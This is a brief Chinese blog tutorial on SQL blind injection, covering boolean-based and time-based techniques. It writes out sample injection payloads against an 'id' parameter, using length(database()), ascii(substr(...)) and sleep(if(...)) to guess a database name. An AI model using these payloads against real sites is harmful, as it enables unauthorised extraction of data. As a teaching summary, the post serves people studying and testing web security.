当前位置：首页 > 数据库 > 正文

sql盲注

2020-03-02 数据库

1、sql盲注漏洞：

1、通过真假来判断。调整and后面的数据真假来对比

2、length(str)获取字符串长度 id=1‘ and length(database())=8--

3、猜解字符串 ascii(‘test‘) id=1‘ and ascii(substr(database(),1,1))>64 破解字符串

2、延时注入：

1、if （length(database())>4,5,0）

2、sleep（if （length(database())>4,5,0））

eg:id=1‘ and sleep(if(length(database())>10,5,0))

3、id=1‘ and if(ascii(substr(database(),1,1))>114, 0, sleep(5))

温馨提示: 本文由Jm博客推荐，转载请保留链接: https://www.jmwww.net/SQL/24913.html

上一篇：MySQL之常用查询
下一篇：ArcGIS Engine连接ArcSDE SQL Server（获得所有SDE图层）

Jm-杰米博客Jamie
草根站长的技术交流乐园！IT不会不要紧快来好好学习吧！

20786文章总数

3164217访问次数

建站天数

推荐文章

一加8 Pro真机现身地铁：单挖孔曲面屏设计，后置四摄 2020/03/30
iFixit 拆解iPad Pro 2020：A12Z 加 6GB 内存，激光雷达露真容 2020/03/30
Intel 推送最新 Win10 图形显卡、WiFi、蓝牙驱动程序更新 2020/03/30
微软 Win10 KB4541335 部分用户安装失败 2020/03/30
小米门店 GO 全新升级，4 月 1 日见 2020/03/30

热门文章

一加8 Pro真机现身地铁：单挖孔曲面屏设计，后置四摄 2020/03/30
iFixit 拆解iPad Pro 2020：A12Z 加 6GB 内存，激光雷达露真容 2020/03/30
Intel 推送最新 Win10 图形显卡、WiFi、蓝牙驱动程序更新 2020/03/30
微软 Win10 KB4541335 部分用户安装失败 2020/03/30
小米门店 GO 全新升级，4 月 1 日见 2020/03/30

标签

友情链接

云作坊资源下载